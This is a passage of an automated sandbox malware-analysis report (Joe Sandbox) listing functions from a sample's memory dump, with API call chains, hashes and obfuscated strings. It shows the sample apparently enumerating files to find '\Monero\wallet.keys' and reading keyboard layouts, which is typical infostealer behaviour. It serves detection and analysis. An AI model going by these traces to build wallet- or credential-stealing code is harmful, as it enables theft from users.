                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 3947ec8b4e6ddfcb04477b8b67ce728532a1fe5c0f78f037ce992392e42e8345
                  • Instruction ID: c597f54b6a623b795efe94fafac30f90a1c7abca5dff78255ffbc9a1c4c3e82c
                  • Opcode Fuzzy Hash: 3947ec8b4e6ddfcb04477b8b67ce728532a1fe5c0f78f037ce992392e42e8345
                  • Instruction Fuzzy Hash: E712C1719101189AEB1DFB64CC96AED7378FF54300F4041AAA51AE61D1EF346B89CFA3
                  Function 0087DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00890C2E), ref: 0087DE5E
                  • StrCmpCA.SHLWAPI(?,008914C8), ref: 0087DEAE
                  • StrCmpCA.SHLWAPI(?,008914CC), ref: 0087DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0087E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 449511048729a04b1a8bc2d775689a4220cea3e9eb69165d88256bd0b536dc55
                  • Instruction ID: dfa998e5cf47fe92ad00926f7f0cbb6542f76d75826806a1437d03dbbf184ba2
                  • Opcode Fuzzy Hash: 449511048729a04b1a8bc2d775689a4220cea3e9eb69165d88256bd0b536dc55
                  • Instruction Fuzzy Hash: 37F17F718141189AEB19FB64DD95AEE7338FF54300F5041EAA41AE20D1EF346B8ACF63
                  Function 00C2E424 Relevance: 14.1, Strings: 10, Instructions: 1559COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: c)8$.}~$/XUo$W@7$X?[_$[5s$aq~/$c4Gp$wuu.$yOQS
                  • API String ID: 0-310255681
                  • Opcode ID: f23230b4c77f10f749b79180db0af7f433f86077b70f04eb75f3a21a719aca15
                  • Instruction ID: 3d7c3d9fcc5f9cbab871c010388f38e3eb4b51a678c18885e756ea91142a4eae
                  • Opcode Fuzzy Hash: f23230b4c77f10f749b79180db0af7f433f86077b70f04eb75f3a21a719aca15
                  • Instruction Fuzzy Hash: C3B208F360C2049FD304AF2DEC8567ABBE5EF94720F16853DEAC487744E63558058697
                  Function 0087DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008914B0,00890C2A), ref: 0087DAEB
                  • StrCmpCA.SHLWAPI(?,008914B4), ref: 0087DB33
                  • StrCmpCA.SHLWAPI(?,008914B8), ref: 0087DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0087DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: fddd3aa71d67bb6d25048e994cf8d9c95e91c1e997be3234edac0afccdb05a8d
                  • Instruction ID: c79b14289ac14a5b8830d212a1ed966db3d77f7ddc68ba7de94723d9e9c1709a
                  • Opcode Fuzzy Hash: fddd3aa71d67bb6d25048e994cf8d9c95e91c1e997be3234edac0afccdb05a8d
                  • Instruction Fuzzy Hash: 7C91547290010497DB18FBB8DC969ED737DFF94300F408669A85AD6195EE38EB098B93
                  Function 00887B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,008905AF), ref: 00887BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00887BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00887C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00887C62
                  • LocalFree.KERNEL32(00000000), ref: 00887D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f835def071628f6ff7c74e0dff456e7fa494b0c7d6ec37eee346b0c0cd68ee28
                  • Instruction ID: ebeec545bb2876868045ad3ca3ab524606d40e5ac3c778fcb54b56d15f21a1d6
                  • Opcode Fuzzy Hash: f835def071628f6ff7c74e0dff456e7fa494b0c7d6ec37eee346b0c0cd68ee28
                  • Instruction Fuzzy Hash: B4414F7194021CABDB24EB94DC99BEDB774FF54700F2041D9E409A2291DB786F86CFA2
                  Function 00C40AA4 Relevance: 10.4, Strings: 7, Instructions: 1686COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6Y$Am}{$YqH_$ZhjG$ecy|$bow$pM]
                  • API String ID: 0-778756910
                  • Opcode ID: b6bcdec2871480778908ed3d76f60c0921f7e9cd93fb7c77fd6c240a90f17dd1
                  • Instruction ID: 78eaa14f0a3bfe2002aba495798f7aa30942ebe39bf3eb3b49c02f27071f6a57
                  • Opcode Fuzzy Hash: b6bcdec2871480778908ed3d76f60c0921f7e9cd93fb7c77fd6c240a90f17dd1
                  • Instruction Fuzzy Hash: FEB229F3A0C214AFE704AE2DDC8567ABBE9EFD4720F16453DEAC4C3744E93598058692
                  Function 0087E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00890D73), ref: 0087E4A2
                  • StrCmpCA.SHLWAPI(?,008914F8), ref: 0087E4F2
                  • StrCmpCA.SHLWAPI(?,008914FC), ref: 0087E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 84597ed14de7c55752ad096b3aaa9fb77af365ff2f0650fb9ec4c0d2aa3aaf91
                  • Instruction ID: b3c4455f9fd989cc337c2e4fa7fdf77d8aa36c6a87931a620b9ff15fa03b293f
                  • Opcode Fuzzy Hash: 84597ed14de7c55752ad096b3aaa9fb77af365ff2f0650fb9ec4c0d2aa3aaf91
                  • Instruction Fuzzy Hash: 1C1221719101189AEB1CFB64DD96AED7338FF54300F4041AAA51AE61D1EF386F49CBA3
                  Function 00C4406C Relevance: 9.1, Strings: 6, Instructions: 1646COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "h`$/M|$7]mW$r9{$~hiz$>_{
                  • API String ID: 0-2311371758
                  • Opcode ID: 68470f1fdd4159dd062a99fc2650d7e15f5a5ca0df4a2591a8aee5f0d9e01711
                  • Instruction ID: b8e06396bcf51e59e5553ca36b9a3b47a2ceff73d5dc931aeaeed5e3613a3eb7
                  • Opcode Fuzzy Hash: 68470f1fdd4159dd062a99fc2650d7e15f5a5ca0df4a2591a8aee5f0d9e01711
                  • Instruction Fuzzy Hash: 53B22AF360C2049FE3086E2DEC8567ABBE9EF94720F1A493DE6C5C3740EA7558058697
                  Function 00C2FDCB Relevance: 9.1, Strings: 6, Instructions: 1563COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mc$J=uy$_ix$cB{o$gE?7$E{~
                  • API String ID: 0-99628553
                  • Opcode ID: 40721776725897aa4c74ca6786f9f88d19338dd326f331be15640db1f49c3bca
                  • Instruction ID: 5ec2cc590bc4d2479de3a17a3a075fcf0137a15eb261934b69eb4e9584c028c7
                  • Opcode Fuzzy Hash: 40721776725897aa4c74ca6786f9f88d19338dd326f331be15640db1f49c3bca
                  • Instruction Fuzzy Hash: 66B204F360C6049FE3046E29EC8567ABBE5EF94320F1A493DEAC5C7744EA3598408797
                  Function 00C31807 Relevance: 7.9, Strings: 5, Instructions: 1672COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: AF%o$Kd'y$]+G?$h:{7$t/S?
                  • API String ID: 0-3972565341
                  • Opcode ID: 969eef0a14ca30afb431710f39f9a665da184bfa9cdc2f0ccb6e781a6c7c8afe
                  • Instruction ID: eb406d1fbeea2145ab449135e6f7752f6320bc26bb7aab979b426119ce743d16
                  • Opcode Fuzzy Hash: 969eef0a14ca30afb431710f39f9a665da184bfa9cdc2f0ccb6e781a6c7c8afe
                  • Instruction Fuzzy Hash: C0B217F390C214AFE3046E2DEC8567ABBE9EF94320F16493DEAC4C7740E67558418796
                  Function 00C39E6F Relevance: 7.9, Strings: 5, Instructions: 1620COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
